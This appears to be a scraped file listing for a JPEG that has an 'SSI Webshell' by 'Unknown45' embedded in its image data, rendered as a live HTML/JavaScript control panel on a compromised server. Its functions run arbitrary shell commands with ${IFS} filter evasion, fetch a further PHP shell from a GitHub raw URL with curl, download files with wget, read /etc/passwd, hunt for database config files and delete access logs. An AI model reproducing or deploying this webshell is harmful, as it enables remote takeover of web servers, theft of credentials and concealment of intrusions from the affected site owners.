Jump to:
Screenshot
Attributes
Title
��� JFIF H H ��<!-- Author : Unknown45 -->
Not Supported Command
<html>
<head>
<title>SSI Webshell x</title>
<meta name="theme-color" content="#000">
<meta name="Author" content="Unknown45">
<meta name="description" content="Security ? that just an illusion - ">
<meta property="og:description" content="Security ? that just an illusion - ">
</head>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/pace-js@latest/pace.min.js"></script>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/pace-js@latest/pace-theme-default.min.css">
<script language="javascript">
function unknown45()
{
var uri = document.getElementById('command').value;
var rep = uri.replace(/[ ]/g,'${IFS}');
var res = encodeURI(uri);
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+encodeURI(rep)+"&&test";
}
function refresh() {
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin";
}
function checkfile() {
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"ls${IFS}-la";
}
function readpass() {
var selectedobj=document.getElementById('readpass');
if(selectedobj.className=='hide'){ //check if classname is hide
selectedobj.style.display = "block";
selectedobj.readOnly=true;
selectedobj.className ='show';
}else{
selectedobj.style.display = "none";
selectedobj.className ='hide';
}
}
function readnamed() {
var selectedobj=document.getElementById('readnamed');
if(selectedobj.className=='hide'){ //check if classname is hide
selectedobj.style.display = "block";
selectedobj.readOnly=true;
selectedobj.className ='show';
}else{
selectedobj.style.display = "none";
selectedobj.className ='hide';
}
}
function movefiles() {
var selectedobj=document.getElementById('movefiles');
if(selectedobj.className=='hide'){ //check if classname is hide
selectedobj.style.display = "block";
selectedobj.readOnly=true;
selectedobj.className ='show';
}else{
selectedobj.style.display = "none";
selectedobj.className ='hide';
}
}
function upfiles() {
var selectedobj=document.getElementById('upfiles');
if(selectedobj.className=='hide'){ //check if classname is hide
selectedobj.style.display = "block";
selectedobj.readOnly=true;
selectedobj.className ='show';
}else{
selectedobj.style.display = "none";
selectedobj.className ='hide';
}
}
function renamefiles() {
var selectedobj=document.getElementById('renamefiles');
if(selectedobj.className=='hide'){ //check if classname is hide
selectedobj.style.display = "block";
selectedobj.readOnly=true;
selectedobj.className ='show';
}else{
selectedobj.style.display = "none";
selectedobj.className ='hide';
}
}
function deletefiles() {
var selectedobj=document.getElementById('deletefiles');
if(selectedobj.className=='hide'){ //check if classname is hide
selectedobj.style.display = "block";
selectedobj.readOnly=true;
selectedobj.className ='show';
}else{
selectedobj.style.display = "none";
selectedobj.className ='hide';
}
}
function findfiles() {
var selectedobj=document.getElementById('findfiles');
if(selectedobj.className=='hide'){ //check if classname is hide
selectedobj.style.display = "block";
selectedobj.readOnly=true;
selectedobj.className ='show';
}else{
selectedobj.style.display = "none";
selectedobj.className ='hide';
}
}
function addupload()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"curl${IFS}-Ls${IFS}raw.githubusercontent.com/admin-security/admin/main/install.php${IFS}|${IFS}tee${IFS}-a${IFS}install.php";
}
function checkroot() {
var uri = "ls -la ";
var rep = uri.replace(/[ ]/g,'${IFS}');
var res = encodeURI(uri);
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+encodeURI(rep)+"/opt/lampp/htdocs";
}
function deletelog() {
var yakin = confirm("yakin hapus access logs nya ?");
if (yakin == true) {
var uri = "rm -rf ";
var rep = uri.replace(/[ ]/g,'${IFS}');
var res = encodeURI(uri);
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+encodeURI(rep)+"/opt/lampp/htdocs/../logs/ *";
} else {
return true;
}
}
function delsel() {
var uri = "rm -rf ";
var rep = uri.replace(/[ ]/g,'${IFS}');
var res = encodeURI(uri);
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+encodeURI(rep)+"SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin |${IFS}clear${IFS}&&${IFS}echo${IFS}Done";
}
function movesatu()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../"+document.getElementById('movefile').value;
}
function movedua()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../"+document.getElementById('movefile').value;
}
function movetiga()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}../../../"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}../../../"+document.getElementById('movefile').value;
}
function moveroot()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"mv${IFS}"+document.getElementById('movefile').value+"${IFS}/opt/lampp/htdocs/"+document.getElementById('movefile').value+"${IFS}&&${IFS}realpath${IFS}/opt/lampp/htdocs/"+document.getElementById('movefile').value;
}
function upfile()
{
var url = document.getElementById('linknya').value;
var https = url.split("https://").join("");
var http = https.split("http://").join("");
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"wget${IFS}"+encodeURI(http)+"${IFS}"+"--no-check-certificate${IFS}&&${IFS}ls${IFS}-la";
}
function renamefile()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"mv${IFS}"+document.getElementById('renameawal').value+"${IFS}"+document.getElementById('renameakhir').value+"${IFS}&&${IFS}ls${IFS}-la";
}
function deletefile()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la";
}
function deleteinroot()
{
var yakin = confirm("yakin hapus file ini di directory root ?");
if (yakin == true) {
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"rm${IFS}-rf${IFS}"+"/opt/lampp/htdocs/"+document.getElementById('deletefile').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}/opt/lampp/htdocs";
} else {
return true;
}
}
function deletefiledua()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"rm${IFS}-rf${IFS}"+document.getElementById('deletedir').value+"/"+document.getElementById('deletefiledua').value+"${IFS}&&${IFS}ls${IFS}-la${IFS}"+document.getElementById('deletedir').value;
}
function findfile()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"du${IFS}-ah${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;
}
function findinroot()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"du${IFS}-ah${IFS}"+"/opt/lampp/htdocs${IFS}"+"|${IFS}grep${IFS}"+document.getElementById('findfile').value;
}
function findfiledua()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"du${IFS}-ah${IFS}"+document.getElementById('finddir').value+"${IFS}|${IFS}grep${IFS}"+document.getElementById('findfiledua').value;
}
function finddb()
{
document.location.href="SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin?"+"du${IFS}-ah${IFS}"+"/opt/lampp/htdocs${IFS}"+"|${IFS}grep${IFS}-e${IFS}config.php${IFS}-e${IFS}database.php${IFS}-e${IFS}config.inc.php${IFS}-e${IFS}koneksi.php";
}
</script>
<style type="text/css">
@import url('https://fonts.googleapis.com/css2?family=Kelly+Slab&display=swap');
.input {
background: transparent;
border-width: thin;
cursor: pointer;
border: 1.5px solid deeppink;
}
button {
cursor: pointer;
border: 1.5px solid deeppink;
border-radius: 5px;
font-size: 1rem;
color: white;
background-color: transparent;
margin-bottom: 0.3rem;
font-family: 'Kelly Slab';
}
button:hover {
color: lime;
border: 1.5px solid white;
}
</style>
</head>
<body onload="checkaja()" style="color: black;font-size: 0px;background: black;font-family: 'Kelly Slab';">
<div style="text-align: center;font-size: 2rem;color: white;">
<font>SSI WEBSHELL</font>
</div>
<div style="text-align: center;color: white;font-size: 1rem;">
<font>Command : </font>
<input type=text size=60 id=command class="text" name="address1" style=" background-color: transparent;color: white;font-size: 1rem;border: 1.5px solid deeppink;border-radius: 5px;">
<button class="input" id="gas" onclick="unknown45();">
<span>Execute</span>
</button>
</div>
<div style="border: 1.5px solid deeppink;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;">
<font style="color: white;">Host : </font><font style="color: lime;"> 10.0.2.2 </font><br />
<font style="color: white;">Server Address : </font><font style="color: lime;"> 127.0.0.1 </font><br />
<font style="color: white;">User : </font><font style="color: lime;"> uid=1(daemon) gid=1(daemon) groups=1(daemon)
</font><br />
<font style="color: white;">System : </font><font style="color: lime;"> </font><br />
<font style="color: white;">Current Path : </font><font style="color: lime;"> /opt/lampp/htdocs/phpScan/queue/SSI.shtml.0e5e7fa692986ff22953c6b6bc2c9d65.bin </font><br />
</div>
<div style="padding-top:5px; padding-buttom:5x;color: white;font-size: 1rem;text-align: center;">
<button onclick="refresh()">Refresh</button>
<button onclick="checkfile()">List File</button>
<button onclick="renamefiles()">Rename File</button>
<button onclick="movefiles()">Move File</button>
<button onclick="deletefiles()">Delete File</button>
<button onclick="findfiles()">Find File</button>
<button onclick="upfiles()">Upload File</button>
<button onclick="delsel()">Remove Shell</button>
</div>
<div style="padding-top:5px; padding-buttom:5x;color: white;font-size: 1rem;text-align: center;">
<button onclick="readpass();">Read /etc/passwd</button>
<button onclick="readnamed();">Read /etc/named.conf</button>
<button onclick="addupload()">Upload Shell</button>
<button onclick="checkroot()">Check Root Directory</button>
<button onclick="deletelog()">Delete Access Logs</button>
</div>
<div style="border: 1.5px solid deeppink;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;">
<font style="color: white;font-size: 1rem;">Executed Command : </font>
<font id="cmd" style="color: white;font-size: 1rem;">whoami</font><br />
<textarea bgcolor=#e4e0d8 cols=121 rows=15 style="resize: none;font-family: 'Kelly Slab';background-color: transparent;width:99%;border: 1.5px solid lime;border-radius: 5px;padding: 0.5rem;color: white;font-size: 1rem;margin: 0.3rem;">daemon
</textarea>
<script>
var cmd = document.getElementById("cmd").innerHTML.split("${IFS}").join(" ");
document.getElementById("cmd").innerHTML = cmd;
var gaskan = document.getElementById("command");
gaskan.addEventListener("keyup", function(event) {
if (event.keyCode === 13) {
event.preventDefault();
document.getElementById("gas").click();
}
});
</script>
<font id="readpass" style="display:none;color: white;font-size: 1rem;"><br>Read : <b>/etc/passwd</b><br>
<textarea bgcolor="#e4e0d8" cols="121" rows="15" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;">Not Supported Command</textarea>
</font>
<font id="readnamed" style="display:none;color: white;font-size: 1rem;"><br>Read : <b>/etc/named.conf</b><br>
<textarea bgcolor=#e4e0d8 cols="121" rows="15" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;">Not Supported Command</textarea>
</font>
<font id="movefiles" style="display:none;color: white;font-size: 1rem;"><br>Move File to <b>previous directory</b><br><br>
filename : <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="movefile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea>
<button onclick="movesatu()">1 directory</button> <button onclick="movedua()">2 directory</button> <button onclick="movetiga()">3 directory</button> <button onclick="moveroot()">root directory</button>
</font>
<font id="renamefiles" style="display:none;color: white;font-size: 1rem;"><br>Rename <b>File</b><br><br>
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameawal" style="resize: none; outline: none" required></textarea> to <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="renameakhir" style="resize: none; outline: none" required></textarea><br><button onclick="renamefile()">Gaskan</button>
</font>
<font id="upfiles" style="display:none;color: white;font-size: 1rem;"><br>Upload File<br><br>
Link : <textarea bgcolor="#e4e0d8" cols="100" rows="1" id="linknya" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="upfile()">Gaskan</button>
</font>
<font face="courier" size="2" id="deletefiles" style="display:none;color: white;font-size: 1rem;"><br>Delete <b>File</b><br>
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea>
<button onclick="deletefile()">Delete</button> <button onclick="deleteinroot()">Delete this in root directory</button><br><br>delete <b>file</b> in <b>custom directories</b><br><textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletefiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="deletedir" style="resize: none; outline: none" required></textarea> <button onclick="deletefiledua()">Delete</button>
</font>
<font id="findfiles" style="display:none;color: white;font-size: 1rem;"><br>Find <b>Files</b><br>
<textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfile" style="color: white;resize: none; outline: none;border: 1.5px solid lime;background-color: transparent;font-size: 1rem;border-radius: 5px;" required></textarea> <button onclick="findfile()">Find</button> <button onclick="finddb()">find database location (beta)</button> <button onclick="findinroot()">Find this in root directory</button><br><br>find <b>files</b> in <b>custom directories</b><br><textarea bgcolor="#e4e0d8" cols="25" rows="1" id="findfiledua" style="resize: none; outline: none" required></textarea> in directory <textarea bgcolor="#e4e0d8" cols="25" rows="1" id="finddir" style="resize: none; outline: none" required></textarea> <button onclick="findfiledua()">Find</button>
</font>
</div>
</body>
</html>
�� C
%# , #&')*)-0-(0%()(�� C
(((((((((((((((((((((((((((((((((((((((((((((((((((�� � � �� �� �� �P �A�!)10 ��""�� "*��@�� ��#+�OK&�� 2�Ec�xo� "�P��B}�� ����� �:9:9=<G$�� S,�"5�R2�i��ғ 3ʥ�3@�;":%885I@ e�
E��"�H�Z ς�Z9 .�� ���[+��M� �� , 0" !1234#$5@P`�� � �? $|�,.,���1�:�Q �<(���Q�Xi�*3���|T��}h�� L,I�V��|�hoZ��9��ȅ*�+�%��Y_�|5fcq�A�<���"8#_i � x���|�pۨ��p�+a�Q�uoŝȡ`sޚ5�n���.�:v��]�Mk��E�Gh�Ѐ"��B���i�f�<��O:��J�ԍ]o�҈g��Zz�!Xg{<6R�{�x'��`M����?�[Z�ط#5y�t�L�7S�) �vX���^�݈���;=�@^���Ƽ���
��
h��5� ���\ ����� ��� ?4� �� ��� ?4� �� 4 !1"02AQqa 3B��#@P`r������ ?��f`��Y�ʉ�j����Zkx��@N�JaS������}����r��t��SɁ�3�p�e��W*͎�z4v\�c����`zdg�dGu3�� ��=�2p*��#��l�9�<���A���Pu��k�������8�
�
�4k*;���������8���2�b��VӋE�t�[0�kmli�㵑39�i����2��o}
mM����kF
\�:2�+w{{���-��$xVRkEA�N�]�^�R�[ryeV�G*G4��m�mӃ�N�!��hF�v��I�R��D�_�Q�p��T[l��D�.nNӢ����O��˚�i7+�=�=8qJ���'����K�B{���K�͟e�5���:��� e��1��w�m��[MA���č��Vj��mȵ�z)��
č��}��n�(���9��?�� ) !1AQ0aq��� ��@�P`�� ?!� @v�,c�֟$M��6_���⠾SD$��!�/Y��:�NQ���!�c(��^��b�y��u��+�.H�U$�%嗗��ry�N>��]����X0�2D�q�q}Z��˥4ao����M,E�؇Uq� �Ϙc�AC\� :�+R��-�/9�Z
�O�A*��|��+,u�~�#G
�B" ���D�X1��_�VwP���OY��"�d��+V�a�\�t�v�^��[��j�c3�^�f4 KTFS��cNI��F�� x1F9
�m��@��YڭQ�+(��D��Dߵ[���$�M���&��D�Z�V��&ձGi�@�t}�к�/+�4����wd0Dh����
��aa�M='�g�UK�M��7�M+�O}��
��4�r�ԋ�t��g\F,0���k��aX���U� ��5y��6�@�2��
��DmZ�V{�9]A�.m�EKZ��2 ���?�� �I$�I$�I$�I$�I$�I$�I$�I$A$�I$�@$I$�I I$�I � $�I$�I$I$�II$�I$� �I$�I$�I$�I A$�I$ �I$��$�I @�I$�$�I$�I �@$�I$�I$�I$�I$�I$��� ��� ?4� �� ��� ?4� �� + !1AQ�aq�0����� ��@P`�� ?� ���(Ir��ʲo��(��#)�0�a �?&�4�0�~��4Տ���K�Fhg~���� թ̛]NH
�� �}��N��:��5{y���o�BNb���s��� ��C� t��kM�)j*D��$<�������gN���C��s%A#�*� =�@`䠴�?T+�U}�b��ʩ� D+�ϪG����!������j_�*)C�_ЂG�%�ү�4�X��T ��IH������0r�"